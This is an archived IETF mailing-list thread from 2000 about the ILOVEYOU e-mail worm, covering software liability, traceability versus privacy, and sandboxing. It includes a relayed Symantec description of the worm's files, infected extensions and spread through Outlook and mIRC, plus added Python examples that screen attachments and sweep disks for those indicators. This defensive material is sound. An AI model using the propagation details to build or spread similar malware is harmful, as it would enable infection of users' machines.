At 11.07 -0800 0-05-07, [EMAIL PROTECTED] wrote: Well, I was there, and I question the validity of your assessment of what was going on. While it is true that there was a clear consensus opposed to adding wiretapping facilities in the RAVEN sense, it was by no means 95-98 percent. Perhaps I misunderstood the question being asked at the meeting. I understood the question to be if we wanted to develop protocols to help police trace net villains, you understood it to be more restricted in only helping police perform wiretapping. At 21.39 -0700 0-05-07, James P. Salsman wrote: I fully agree and have decided to sponsor a contest to correct the situation. I will give one share of Microsoft stock to the first person who posts, to this IETF Discussion list, a draft shareholder resolution that would, in the opinion of Keith Moore or his designated alternate, correct the situation if it were adopted by Microsoft Corporation as we currently know it. Certainly, Microsoft software could be designed to make it more difficult for virus spreading. However, the villains will learn to get around such features. Compare with spammers. A few years ago, you could easily detect spamming by checking if a message did not come from a mailing list you subscribed to, and did not have your name in any of the recipient fields. Today, more and more spam messages even contain your name in the text in some kind of greeting "Hello Jacob", which obviously was put there to confound spam checkers who detect spam by checking if many identical messages are sent. At 06.38 -0400 0-05-08, Garreth Jeremiah wrote: The "Java" sandbox idea in my mind is a great one. My experience is that almost everywhere I wanted to do something useful with applets, what I wanted to do was forbidden by security restrictions. At 15.05 +0200 0-05-08, Magnus Danielson wrote: What you really would like to have is a common accept/deny type of list. This would trim down the required OK's quite a lot. 
Those which are on the deny list would be silently denied and those on the accept list would be silently accepted. Only those not existing on either of the lists would actually require manual intervention in approving. This will only work if the identity of the allowed senders was identified with cryptographic methods. Otherwise, the virus senders will find ways to make believe being the people you trust.
--- Methods helping the police track virus makers:
(1) Making software more restrictive in accepting foreign code. Comment: Will help, unless the virus producers learn to circumvent it. Has the risk of making life for ordinary legal users more difficult.
(2) Improve (1) with strong cryptographic methods to identify trusted senders. Comment: A promising method, if only strong cryptographic methods get commonly used. Note however, those of you who want to protect anonymity: Strong cryptographic methods are methods to identify people securely, not methods to allow people to be anonymous.
(3) Tracing and logging feature to find out where the virus came from. Comment: Virus makers will certainly try to cheat such systems by incorrect identification such as sender's IP address. But I still believe this is one of the most promising methods.
(4) Sandbox environments for executing possibly dangerous code. Comment: Every good programming language should be designed as a "virtual machine" where a program, when executed, cannot do anything outside of this protected environment. I wrote this already in a paper published in Datamation, December 1975, pp 77-80, with the title "Languages for Reliable Software". However, the safest sandboxes are also those most restrictive against doing legal things well.
(5) Create anti-bodies which scan incoming data and detect known viruses. This is the main method of the anti-virus software sold today. It is, however, becoming more difficult since the number of viruses is getting so large that the anti-body creators have problems keeping up with it.
I do not think this is an either/or situation. To stop the proliferation of viruses, we should do all of this. And IETF can certainly help, by designing methods to support all of these anti-virus activities. I do not think we can ever stop people from producing viruses. If, however, we make the risk of getting caught large enough, most of them will find other methods of venting their anger at society, like stealing hubcaps or crashing windows. There is an obvious conflict between anonymity, privacy, and detecting criminal behaviour. Different people position themselves at different places on this scale, but you cannot deny that the conflict exists. Crime is much more common in urban than rural areas - just because people are more easily anonymous in the urban areas. -- Jacob Palme [EMAIL PROTECTED] (Stockholm University and KTH) for more info see URL:
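The accept/deny list discussed in the message above, and the objection that it only works when the sender's identity is proven cryptographically, can be compared side by side. The following Python is an added example, not code from any poster: the addresses, keys and messages are constructed, and HMAC-SHA256 over a per-correspondent shared key stands in for a real digital signature such as S/MIME or OpenPGP.

```python
import hashlib
import hmac

# Constructed policy data (assumptions for this example only).
ACCEPT = {"alice@example.org"}          # silently accepted
DENY = {"bulk@example.net"}             # silently denied
SHARED_KEYS = {"alice@example.org": b"constructed-demo-key-alice"}


def make_tag(key: bytes, sender: str, body: str) -> str:
    """Authentication tag binding the claimed sender to the exact body."""
    data = sender.encode("utf-8") + b"\n" + body.encode("utf-8")
    return hmac.new(key, data, hashlib.sha256).hexdigest()


def identity_proven(sender: str, body: str, tag) -> bool:
    """True only if the message carries a valid tag for the claimed sender."""
    key = SHARED_KEYS.get(sender)
    if key is None or not tag:
        return False
    expected = make_tag(key, sender, body)
    # Constant-time comparison on bytes, so a malformed tag cannot raise.
    return hmac.compare_digest(expected.encode("utf-8"), str(tag).encode("utf-8"))


def decide(msg: dict, verify: bool = True) -> str:
    """Return 'deny', 'accept' or 'ask' (manual approval needed).

    verify=False models a list keyed on the From header alone;
    verify=True requires proof of identity before a silent accept.
    """
    sender = msg["from"].strip().lower()
    if sender in DENY:
        return "deny"
    if sender in ACCEPT:
        if not verify or identity_proven(sender, msg["body"], msg.get("tag")):
            return "accept"
        return "ask"  # trusted name, unproven identity: never silent
    return "ask"


def sample_messages() -> list:
    """Constructed messages covering each branch of the policy."""
    alice = "alice@example.org"
    key = SHARED_KEYS[alice]
    body = "Agenda for Thursday attached."
    good_tag = make_tag(key, alice, body)
    return [
        {"name": "genuine", "from": alice, "body": body, "tag": good_tag},
        # Header names a trusted sender, but nothing proves it.
        {"name": "spoofed", "from": alice,
         "body": "kindly check the attached LOVELETTER coming from me.",
         "tag": None},
        # Valid tag copied onto a modified body.
        {"name": "tampered", "from": alice,
         "body": body + " Also run the attachment.", "tag": good_tag},
        {"name": "denied", "from": "bulk@example.net", "body": "offer", "tag": None},
        {"name": "unknown", "from": "stranger@example.com", "body": "hi", "tag": None},
    ]


def compare() -> dict:
    """Map message name -> (header-only decision, verified decision)."""
    return {m["name"]: (decide(m, verify=False), decide(m, verify=True))
            for m in sample_messages()}


if __name__ == "__main__":
    for name, (header_only, verified) in compare().items():
        print(f"{name:9s} header-only={header_only:6s} verified={verified}")
```

Proof of identity says who sent a message, not that its content is safe: mail sent by a worm from a trusted correspondent's own client, with access to that client's key, still verifies, which is why method (4) remains necessary alongside (2).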
Re: VIRUS WARNING
At 20.39 -0400 0-05-04, Keith Moore wrote: but sooner or later folks are going to be held liable for poor engineering or poor implementation of networking software, just like folks today can be held liable for poor engineering or implementation of bridges or buildings. This discussion is highly relevant to the IETF list, if we discuss the problems and how to overcome them, and avoid the never-ending platform war discussions. At the IETF meeting in December 1999, the issue was discussed whether IETF should support changes in protocols which would make it easier to find villains committing crime on the net. This was discussed in a large plenary meeting, with about a thousand people present. A very large majority, something like 95 or 98 percent of those present, voted against this. I was one of the few who voted yes. All of you who voted against designing Internet protocols so as to help police finding the villain of criminal net-behaviour: Have you not changed your mind? Should we not try to find and prosecute the people distributing viruses? Should we not redesign the Internet, so that this becomes easier, for example by doing more logging in the routers, so that you can go back and check from where something illegal came. Or do you mean that this is impossible, because the villains will just get more clever and learn to cheat such procedures? -- Jacob Palme [EMAIL PROTECTED] (Stockholm University and KTH) for more info see URL: http://www.dsv.su.se/jpalme/
Re: VIRUS WARNING
Jacob, in my mind the people most responsible for the viruses are those who built systems that were so easily compromised. we don't need protocol support to track them down. Keith
Re: VIRUS WARNING
--On Sunday, 07 May, 2000 11:17 -0400 Keith Moore [EMAIL PROTECTED] wrote: in my mind the people most responsible for the viruses are those who built systems that were so easily compromised. we don't need protocol support to track them down. Keith, This is a difficult issue and, IMO, a slippery slope. I want to agree with you, I really do, partially because I believe that it is a really bad idea for organizations to ship software with all security controls off by default, especially if there is no really easy way to enable those controls, and that companies that do so should take responsibility for the consequences. However, in the more general case, if one takes the position that, if I build a dangerous-but-useful tool and someone misuses it, I should be held responsible, we are going to end up with rules against a lot of very useful stuff including, in extreme cases, many open source environments. While this situation has not changed my feelings about the Raven outcome any more than it has yours, this is probably not a good situation about which to get simplistic. john
Re: VIRUS WARNING
Keith Moore [EMAIL PROTECTED] wrote: but sooner or later folks are going to be held liable for poor engineering or poor implementation of networking software, just like folks today can be held liable for poor engineering or implementation of bridges or buildings. I don't see how, as long as the software manufacturers ship the software with legal disclaimers, e.g. "We are not responsible for damages ..." Also, bridges and buildings are built by licensed professionals, for the most part. Comparatively speaking, very few software professionals are licensed in this way. They do accept responsibility for damages; said responsibility is factored into the cost of the bridge or building. [Generalization] Much software is cheap and sold in bulk as a commodity. If for some reason software became significantly more expensive that would limit its spread and growth. We would no longer have the thriving industry we have now. --gregbo
Re: VIRUS WARNING
Date: Sun, 7 May 2000 17:55:19 +0200 To: IETF general mailing list [EMAIL PROTECTED] From: Jacob Palme [EMAIL PROTECTED] Subject: Re: VIRUS WARNING [...] I have set my MS Office programs to always ask me before running a macro in an unknown file in it. The advantage is less risk for viruses, but the disadvantage is that I have to OK those questions from MS Office of whether to accept macros. And if they occur too often, there is a risk that I click "yes" before thinking through the risk of doing this. [...] Other disadvantages include: o You have very little basis upon which to make a decision. You can decide based upon whether you trust the sender (which isn't much to go on, as shown by the recent batch of Outlook viruses), but you can't decide based on whether the macro might damage your system. o Once you click "yes", there is apparently little limit to the damage that the macro can do, (if it isn't executing in a well-constructed sandbox). -tjs
Re: VIRUS WARNING
but sooner or later folks are going to be held liable for poor engineering or poor implementation of networking software, just like folks today can be held liable for poor engineering or implementation of bridges or buildings. This discussion is highly relevant to the IETF list, if we discuss the problems and how to overcome them, and avoid the never-ending platform war discussions. At the IETF meeting in December 1999, the issue was discussed whether IETF should support changes in protocols which would make it easier to find villains committing crime on the net. This was discussed in a large plenary meeting, with about a thousand people present. A very large majority, something like 95 or 98 percent of those present, voted against this. I was one of the few who voted yes. Well, I was there, and I question the validity of your assessment of what was going on. While it is true that there was a clear consensus opposed to adding wiretapping facilities in the RAVEN sense, it was by no means 95-98 percent. And even more important, this wasn't a vote about mechanisms that would make it easier to find people who distribute viruses. Wiretapping has little if anything to do with tracking down people who distribute viruses. All of you who voted against designing Internet protocols so as to help police finding the villain of criminal net-behaviour: Have you not changed your mind? On wiretapping, no I haven't. Nor have I changed my mind about viruses. But again, one of these has almost nothing to do with the other. The scope of the question asked was very narrowly drawn. You're reading a lot more into the question than was there. Should we not try to find and prosecute the people distributing viruses? Of course we should. But again, this is a matter of having a useful security infrastructure on the net, not wiretapping. 
I suspect that if you asked the same group of people who voted against wiretapping how they felt about security infrastructure you'd get a _very_ different response. Should we not redesign the Internet, so that this becomes easier, for example by doing more logging in the routers, so that you can go back and check from where something illegal came. And once again you're switching topics. The issue of tracing traffic is quite different from wiretapping and quite different from having the tools to track virus distribution end to end. These are three separate matters. Or do you mean that this is impossible, because the villains will just get more clever and learn to cheat such procedures? Your message is now so confused that there's no way I can answer this sensibly. Ned
Re: VIRUS WARNING music at pittsburg?
1/ i think microsoft and the alleged hacker have provided an excellent lesson in active networks 2/ is anyone interested in jamming at the next IETF (folk, jazz, rock, thrash, triphop etc - you know, primal scream...) - i can bring a guitar (or bass or flute or something...) but local folks would be easier on the wrists!!! j.
Re: VIRUS WARNING
Jacob, Given a choice between reducing crime via more government surveillance and reducing crime via software that doesn't do stupid things, I'd far prefer the latter. I don't know of any good reason for a mail reader to make it so easy to execute code that can have harmful side effects, but history has provided us with many examples of governments abusing their power (legitimate or otherwise) to conduct surveillance. not that this is terribly relevant to the ILOVEYOU virus...the virus is being transmitted in the clear; the US government (at least) seems perfectly knowledgeable about it and ISPs appear to have been cooperating with government authorities to help track down the source. it's not as if the code is a secret, and if I believe the news reports the authorities are already very close to nabbing the culprit. (or at least, a suspect...) Keith note that the IETF policy is to not develop facilities specifically for the purpose of supporting government surveillance...this does not mean that IETF is actively trying to prevent governments from conducting surveillance, either using facilities developed for other purposes, or facilities not developed by IETF. it just means that IETF has decided to concentrate its energies in other areas.
Re: VIRUS WARNING
but sooner or later folks are going to be held liable for poor engineering or poor implementation of networking software, just like folks today can be held liable for poor engineering or implementation of bridges or buildings. I don't see how, as long as the software manufacturers ship the software with legal disclaimers, e.g. "We are not responsible for damages ..." sooner or later that phrase will be recognized as less valuable than bovine feces. Keith
Re: VIRUS WARNING
Michael: I could not agree more, we have a few (possibly .. 3) viruses that have infected *nix systems. Even more telling, look at how linux systems have NOT been infected or bothered much. I find this interesting since the code - bugs, wart, and any holes are available to any who want to look at it... Now if I take and switch the machine I am typing on over to that "other" o/s the virus scanner it has lists 100's and I mean 100's of viruses... I do understand that some of us are STUCK with that other O/S... but there are options.. I too am in theory using it.. but only when I have to... I do all my real work on the linux side and only occasionally fire up the other side to read an awful .doc or .ppt file... I simply refuse to allow our IT dept to have their way with me and infect me with the worst virus... that other O/S :-) R "Michael H. Warfield" wrote: On Thu, May 04, 2000 at 11:13:03PM -0400, [EMAIL PROTECTED] wrote: On Thu, 04 May 2000 11:11:50 EDT, Scot Mc Pherson [EMAIL PROTECTED] said: In fact to back up your statement, there are exactly 3 virii that infect UNIX based systems. Hmm.. the Morris worm of 1988. What are the other 2? Bliss? Wasn't very sophisticated and it didn't propagate very well, but it did work. It just fizzled out because its propagation coefficient never even came close to break even. What's the other one? Hmm.. if you count the 2 self-reproducing sample programs that came with 'gcc', no others. Or maybe there's more than 3, which is likely since I've seen at least 4 different "proof of concept" level creations... I've seen some assembly code someone was proposing on one of the development lists. One of the DOS virus writers claiming that it would work as a Linux virus. No evidence that it does anything though. I would marginally call that one a "proof of concept" or a "maybe of concept". Valdis Kletnieks Operating Systems Analyst Virginia Tech Mike -- Michael H. 
Warfield| (770) 985-6132 | [EMAIL PROTECTED] (The Mad Wizard) | (770) 331-2437 | http://www.wittsend.com/mhw/ NIC whois: MHW9 | An optimist believes we live in the best of all PGP Key: 0xDF1DD471| possible worlds. A pessimist is sure of it! -- Randall R. Stewart Member Technical Staff Network Architecture and Technology (NAT) 847-632-7438 fax:847-632-6733
RE: VIRUS WARNING
The goal of those who write viruses is to get attention, true? I guess they figure that writing their viruses for Windows is going to get them a lot more attention than writing for other operating systems with smaller user bases. :-) Tongue firmly in cheek -- Ian King -- DISCLAIMER: The foregoing is my personal opinion, and should not be construed as the official position of or statement by my employer. -Original Message- From: Randall Stewart [mailto:[EMAIL PROTECTED]] Sent: Friday, May 05, 2000 1:05 PM To: Michael H. Warfield Cc: [EMAIL PROTECTED]; Scot Mc Pherson; [EMAIL PROTECTED] Subject: Re: VIRUS WARNING Michael: I could not agree more, we have a few (possibly .. 3) viruses that have infected *nix systems. Even more telling, look at how linux systems have NOT been infected or bothered much. I find this interesting since the code - bugs, wart, and any holes are available to any who want to look at it... Now if I take and switch the machine I am typing on over to that "other" o/s the virus scanner it has lists 100's and I mean 100's of viruses... I do understand that some of us are STUCK with that other O/S... but there are options.. I too am in theory using it.. but only when I have to... I do all my real work on the linux side and only occasionally fire up the other side to read an awful .doc or .ppt file... I simply refuse to allow our IT dept to have their way with me and infect me with the worst virus... that other O/S :-) R [snip]
Re: VIRUS WARNING
The whole world does not run software which is a good culture medium for email viruses. I mostly use nice old UNIX software and it would take a number of extra steps on my part for some embedded virus to get a chance to run. If your software automatically executes stuff in attachments, you need to change your software, not develop a list of subject lines you are frightened of. Donald From: "Scot Mc Pherson" [EMAIL PROTECTED] To: [EMAIL PROTECTED], [EMAIL PROTECTED] Date: Thu, 4 May 2000 09:27:19 -0400 Message-ID: 00cf01bfb5cc$79bc4280$[EMAIL PROTECTED] Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-MSMail-Priority: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 Importance: Normal In-Reply-To: [EMAIL PROTECTED] Content-Transfer-Encoding: 7bit X-Loop: [EMAIL PROTECTED] Content-Transfer-Encoding: 7bit There is an e-mail virus going around. The subject of the e-mail is ILOVEYOU...I suggest you delete it the moment you receive it. -Scot Mc Pherson, N2UPA -Sr. Network Analyst -ClearAccess Communications -Ph: 941.744.5757 ext. 210 -Fax: 941.744.0629 -mailto:[EMAIL PROTECTED] -http://www.clearaccess.net
THe Value Of Following Standards... (was Re: VIRUS WARNING)
On Thu, 04 May 2000 09:27:19 EDT, Scot Mc Pherson [EMAIL PROTECTED] said: There is an e-mail virus going around. The subject of the e-mail is ILOVEYOU...I suggest you delete it the moment you receive it. Somebody didn't read RFC2046, section 2, where it talks about text/plain being *TEXT*, and application/* being *application data*. So if your e-mail software is opening it and feeding it to Visual Basic just because it's tagged .vbs even though it's a text/plain, you're violating the RFCs. I'm not pointing fingers, but ;) -- Valdis Kletnieks Operating Systems Analyst Virginia Tech
Re: VIRUS WARNING
This is actually genuine for once... it's a vbscript.. On Thu, 4 May 2000, Scot Mc Pherson wrote: There is an e-mail virus going around. The subject of the e-mail is ILOVEYOU...I suggest you delete it the moment you receive it. -Scot Mc Pherson, N2UPA -Sr. Network Analyst -ClearAccess Communications -Ph: 941.744.5757 ext. 210 -Fax: 941.744.0629 -mailto:[EMAIL PROTECTED] -http://www.clearaccess.net A. James Lewis ([EMAIL PROTECTED]) - Linux is swift and powerful. Beware its wrath...
RE: VIRUS WARNING
Actually what happened, was I received this virus from a trusted friend who just so happens would send an e-mail to me with that sort of "literary" content to me as a joke. So as it happens it was a perfect trojan because it slipped under my defenses by being something I would normally expect. My software doesn't open attachments by default. Thus it was entirely my error. I am just glad that I didn't have any e-mail lists in my "address book" In fact to back up your statement, there are exactly 3 virii that infect UNIX based systems. Scot -Original Message- From: Donald E. Eastlake 3rd [mailto:[EMAIL PROTECTED]] Sent: Thursday, May 04, 2000 10:48 AM To: [EMAIL PROTECTED] Subject: Re: VIRUS WARNING The whole world does not run software which is a good culture medium for email viruses. I mostly use nice old UNIX software and it would take a number of extra steps on my part for some embedded virus to get a chance to run. If your software automatically executes stuff in attachments, you need to change your software, not develop a list of subject lines you are frightened of. Donald From: "Scot Mc Pherson" [EMAIL PROTECTED] To: [EMAIL PROTECTED], [EMAIL PROTECTED] Date: Thu, 4 May 2000 09:27:19 -0400 Message-ID: 00cf01bfb5cc$79bc4280$[EMAIL PROTECTED] Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-MSMail-Priority: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 Importance: Normal In-Reply-To: [EMAIL PROTECTED] Content-Transfer-Encoding: 7bit X-Loop: [EMAIL PROTECTED] Content-Transfer-Encoding: 7bit There is an e-mail virus going around. The subject of the e-mail is ILOVEYOU...I suggest you delete it the moment you receive it. -Scot Mc Pherson, N2UPA -Sr. Network Analyst -ClearAccess Communications -Ph: 941.744.5757 ext. 210 -Fax: 941.744.0629 -mailto:[EMAIL PROTECTED] -http://www.clearaccess.net
Re: THe Value Of Following Standards... (was Re: VIRUS WARNING)
From: [EMAIL PROTECTED] Subject: THe Value Of Following Standards... (was Re: VIRUS WARNING) Date: Thu, 04 May 2000 10:46:33 -0400 On Thu, 04 May 2000 09:27:19 EDT, Scot Mc Pherson [EMAIL PROTECTED] said: There is an e-mail virus going around. The subject of the e-mail is ILOVEYOU...I suggest you delete it the moment you receive it. Somebody didn't read RFC2046, section 2, where it talks about text/plain being *TEXT*, and application/* being *application data*. So if your e-mail software is opening it and feeding it to Visual Basic just because it's tagged .vbs even though it's a text/plain, you're violating the RFCs. I'm not pointing fingers, but ;) You are missing the point here, this is user friendliness, the user is allowed to do whatever he/she wants, even in others' equipment with others' data. ;) It does make box management so much easier ;) Cheers, Magnus
Re: THe Value Of Following Standards... (was Re: VIRUS WARNING)
On Thu, May 04, 2000 at 10:46:33AM -0400, [EMAIL PROTECTED] wrote: On Thu, 04 May 2000 09:27:19 EDT, Scot Mc Pherson [EMAIL PROTECTED] said: There is an e-mail virus going around. The subject of the e-mail is ILOVEYOU...I suggest you delete it the moment you receive it. Somebody didn't read RFC2046, section 2, where it talks about text/plain being *TEXT*, and application/* being *application data*. So if your e-mail software is opening it and feeding it to Visual Basic just because it's tagged .vbs even though it's a text/plain, you're violating the RFCs. I'm not pointing fingers, but ;) Your mailer may be able to display it as text (mine, Mutt, certainly can) but it is definitely propagating as type application/octet-stream, not text/plain. Wish we could lay that one on them, but we can't. It's also now reported to be able to propagate across IRC. -- Valdis Kletnieks Operating Systems Analyst Virginia Tech Mike -- Michael H. Warfield| (770) 985-6132 | [EMAIL PROTECTED] (The Mad Wizard) | (770) 331-2437 | http://www.wittsend.com/mhw/ NIC whois: MHW9 | An optimist believes we live in the best of all PGP Key: 0xDF1DD471| possible worlds. A pessimist is sure of it!
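The two points made in this sub-thread, that a text/plain part is text whatever its file name says, and that the worm in fact travelled as application/octet-stream under the name LOVE-LETTER-FOR-YOU.TXT.vbs, translate into a check a mail gateway or reader can apply per attachment. The following Python is an added example, not code from any poster; the extension lists, the action names and the sample message (built inline with harmless placeholder content) are assumptions made for illustration.

```python
from email import message_from_bytes, policy
from email.message import EmailMessage

# Assumed lists: extensions a Windows host hands to a script engine or loader,
# and "harmless-looking" extensions used as a decoy in front of them.
SCRIPT_EXTS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh", ".hta",
               ".exe", ".scr", ".pif", ".bat", ".cmd", ".com"}
DECOY_EXTS = {".txt", ".doc", ".jpg", ".gif", ".pdf", ".htm", ".html"}


def classify(filename, content_type: str) -> dict:
    """Decide what to do with one attachment from its name and declared type."""
    parts = (filename or "").lower().split(".")
    exts = ["." + p for p in parts[1:]]
    final = exts[-1] if exts else ""
    reasons = []
    if final in SCRIPT_EXTS:
        reasons.append("script-extension")
        # NAME.TXT.vbs: hosts that hide known extensions show only NAME.TXT.
        if len(exts) >= 2 and exts[-2] in DECOY_EXTS:
            reasons.append("decoy-double-extension")
        # Declared as text but named like a script: the name must not win.
        if content_type.startswith("text/"):
            reasons.append("text-type-with-script-name")
    if not reasons:
        action = "deliver"
    elif content_type.startswith("text/"):
        action = "render-as-text"   # show it, never dispatch by extension
    else:
        action = "quarantine"       # application data with a script name
    return {"filename": filename, "type": content_type,
            "reasons": reasons, "action": action}


def screen_attachments(raw: bytes) -> list:
    """Parse a raw RFC 822 message and classify every attachment in it."""
    msg = message_from_bytes(raw, policy=policy.default)
    return [classify(part.get_filename(), part.get_content_type())
            for part in msg.iter_attachments()]


def build_sample() -> bytes:
    """Constructed message; attachment bodies are inert placeholder text."""
    msg = EmailMessage()
    msg["From"] = "friend@example.org"
    msg["To"] = "you@example.org"
    msg["Subject"] = "ILOVEYOU"
    msg.set_content("kindly check the attached LOVELETTER coming from me.")
    # As observed in the thread: application/octet-stream, .TXT.vbs name.
    msg.add_attachment(b"' constructed placeholder, not worm code\r\n",
                       maintype="application", subtype="octet-stream",
                       filename="LOVE-LETTER-FOR-YOU.TXT.vbs")
    # The hypothetical case: same kind of name, but declared text/plain.
    msg.add_attachment("' constructed placeholder\n", subtype="plain",
                       filename="readme.TXT.vbs")
    # A benign attachment for contrast.
    msg.add_attachment("meeting notes\n", subtype="plain", filename="notes.txt")
    return msg.as_bytes()


if __name__ == "__main__":
    for finding in screen_attachments(build_sample()):
        print(finding["action"], finding["filename"], finding["reasons"])
```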
RE: VIRUS WARNING
Donald, The whole world will not switch over to Unix - the average user will always be more comfortable with Windows unless Unix will at one point offer the same seamless user-friendliness. So it will always be a problem, one which cannot be solved by telling others not to use what they're accustomed to - and one which cannot be ignored. Lillian Komlossy Site Manager http://www.dmnews.com http://www.imarketingnews.com (212) 925-7300 ext. 232 -Original Message- From: Donald E. Eastlake 3rd [mailto:[EMAIL PROTECTED]] Sent: Thursday, May 04, 2000 10:48 AM To: [EMAIL PROTECTED] Subject: Re: VIRUS WARNING The whole world does not run software which is a good culture medium for email viruses. I mostly use nice old UNIX software and it would take a number of extra steps on my part for some embedded virus to get a chance to run. If your software automatically executes stuff in attachments, you need to change your software, not develop a list of subject lines you are frightened of. Donald From: "Scot Mc Pherson" [EMAIL PROTECTED] To: [EMAIL PROTECTED], [EMAIL PROTECTED] Date: Thu, 4 May 2000 09:27:19 -0400 Message-ID: 00cf01bfb5cc$79bc4280$[EMAIL PROTECTED] Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-MSMail-Priority: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 Importance: Normal In-Reply-To: [EMAIL PROTECTED] Content-Transfer-Encoding: 7bit X-Loop: [EMAIL PROTECTED] Content-Transfer-Encoding: 7bit There is an e-mail virus going around. The subject of the e-mail is ILOVEYOU...I suggest you delete it the moment you receive it. -Scot Mc Pherson, N2UPA -Sr. Network Analyst -ClearAccess Communications -Ph: 941.744.5757 ext. 210 -Fax: 941.744.0629 -mailto:[EMAIL PROTECTED] -http://www.clearaccess.net
Re: VIRUS WARNING
Actually what happened, was I received this virus from a trusted friend but of course you didn't receive the virus from a trusted friend; you received it from an impostor. now you know not to trust names that appear in a message header. Keith
RE: VIRUS WARNING
In addition to what has been posted by me earlier and what has been reported on Symantec's site, I have learned the following.

When the virus is contracted, DO NOT shut down the computer or reboot. The worm is designed to propagate fully during system startup.

It should be noted that you should do a file search based on all files created or modified the day the worm was downloaded...NOTE that the timestamp is irrelevant, I found files that were created at a time when the computer was not turned on so the worm is able to create/modify this info...

In the registry file all references to the five files listed on your website should also be deleted (key and folder). You will find most of the references within the keys that control the system tray and startup control (not the program folder).

The worm also creates an href for IE startup page which downloads the virus again...This should be changed AFTER all the above has been accomplished.

The worm also creates an HTML page LOVE-LETTER-FOR-YOU.TXT.html on your local drive which contains ActiveX scripts which redistribute the worm. Delete this file.

This worm seems to be a sort of application that creates the other files for some sort of source code that utilizes applications already installed on the local drive to rewrite the worm into various forms.

I believe I have wiped out the virus, but I will keep checking...One method of checking this status is to look at the mail queue of your mail server and look for e-mail without controls.

I have received an e-mail from someone else saying these additional sites with information regarding ILOVEYOU, I have yet to visit them.

http://www.securityfocus.com
http://www.datafellows.com/v-descs/love.htm

-Original Message-
From: Scot Mc Pherson [mailto:[EMAIL PROTECTED]]
Sent: Thursday, May 04, 2000 10:35 AM
To: [EMAIL PROTECTED]; [EMAIL PROTECTED]; Brian Duddy (E-mail); Kevin Speilman (E-mail); Michael F. Young (E-mail); Perry Lewis (E-mail); Robert E Sollmann (E-mail); Roger Shepheard (E-mail)
Subject: RE: VIRUS WARNING

The file subject: ILOVEYOU
Name of attachment: LOVE-LETTER-FOR-YOU.TXT.vbs

DO NOT OPEN THE ATTACHMENT. At this time very little is known about the virus. If you have opened the file, please see your network administrator for help. The following link to Symantec has info on what the file does to your system.

http://www.symantec.com/avcenter/venc/data/vbs.loveletter.a.html

Since the webpage is too busy to access I am copying the text portions of the webpage here:

VBS.LoveLetter.A

This is an email worm, mIRC worm, and file infector.

Also known as:
Category: Worm
Infection length: 10307
Virus definitions: Pending

Threat assessment:
Damage: High
Distribution: High
Wildness: High

Wild
Number of infections: More than 1000
Number of sites: More than 10
Geographic distribution: High
Threat containment: Moderate
Removal: Moderate

Damage
Payload:
Large scale e-mailing: All the addresses in Microsoft Outlook address book
Degrades performance: May clog mail servers

Distribution
Subject of e-mail: ILOVEYOU
Name of attachment: LOVE-LETTER-FOR-YOU.TXT.vbs
Size of attachment: 10307

Technical description:

This is a preliminary writeup. The information contained within is to provide as much information as possible at this time.

VBS.LoveLetter.A is an email worm, mIRC worm, and a file infector.

VBS.LoveLetter.A will use Microsoft Outlook and email itself out as an attachment with the above subject line and attachment name. The body of the message will be

kindly check the attached LOVELETTER coming from me.

The virus will also infect files with the following extensions: vbs, vbe, js, jse, css, wsh, sct, hta, jpg, jpeg, mp3, and mp2

The virus will insert the following files:

MSKernel32.vbs in the Windows System directory
Win32DLL.vbs in the Windows directory
LOVE-LETTER-FOR-YOU.TXT.vbs in the Windows System directory
WinFAT32.EXE in the Internet download directory
WIN-BUGSFIX.EXE in the Internet download directory
script.ini in the mIRC directory

SARC recommends Administrators filter on the attachment name and Subject line immediately.

This writeup will be verified and formalized within the hour.

Removal: Delete found infected files.

Write-up by: Eric Chien
Updated: May 4, 2000

-Original Message-
From: Scot Mc Pherson [mailto:[EMAIL PROTECTED]]
Sent: Thursday, May 04, 2000 9:27 AM
To: [EMAIL PROTECTED]; [EMAIL PROTECTED]
Subject: VIRUS WARNING

There is an e-mail virus going around. The subject of the e-mail is ILOVEYOU...I suggest you delete it the moment you receive it.

-Scot Mc Pherson, N2UPA
-Sr. Network Analyst
-ClearAccess Communications
-Ph: 941.744.5757 ext. 210
-Fax: 941.744.0629
-mailto:[EMAIL PROTECTED]
-http://www.clearaccess.net
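The clean-up notes above say file timestamps cannot be trusted, so a sweep has to key on names and content instead. The sketch below is an added example, not part of the original messages or of Symantec's write-up: it looks for the file names quoted in this message, for `.vbs` companions of picture and music files, and for script files whose content is byte-identical to one of those hits (the source posted later in this thread overwrites script files with the worm's own text). The function names and the constructed demo tree are assumptions of this example.

```python
import hashlib
import os

# File names quoted in the message above. script.ini is left out on purpose:
# a clean mIRC installation has one too, so the name alone proves nothing.
KNOWN_NAMES = {n.lower() for n in (
    "MSKernel32.vbs", "Win32DLL.vbs", "LOVE-LETTER-FOR-YOU.TXT.vbs",
    "LOVE-LETTER-FOR-YOU.TXT.html", "WinFAT32.EXE", "WIN-BUGSFIX.EXE",
)}
# Media extensions from the write-up; a ".vbs" appended to one is a red flag.
CARRIER_EXTS = {".jpg", ".jpeg", ".mp3", ".mp2"}


def sha256_of(path):
    """Hash a file in chunks so large files do not have to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def sweep(root):
    """Walk root and return suspicious paths grouped by the rule that matched."""
    known, doubled, script_hashes = [], [], {}
    for dirpath, _dirs, files in os.walk(root):
        for filename in files:
            path = os.path.join(dirpath, filename)
            lowered = filename.lower()
            stem, ext = os.path.splitext(lowered)
            if lowered in KNOWN_NAMES:
                known.append(path)
            if ext == ".vbs" and os.path.splitext(stem)[1] in CARRIER_EXTS:
                doubled.append(path)
            if ext in (".vbs", ".vbe"):
                try:
                    script_hashes.setdefault(sha256_of(path), []).append(path)
                except OSError:
                    continue  # unreadable file: skip it, keep sweeping
    seeds = set(known) | set(doubled)
    # Scripts with an innocent name but the same bytes as a flagged file.
    clones = sorted(
        path
        for group in script_hashes.values()
        if len(group) > 1 and seeds & set(group)
        for path in group
        if path not in seeds
    )
    return {
        "known_name": sorted(known),
        "double_extension": sorted(doubled),
        "content_clone": clones,
    }


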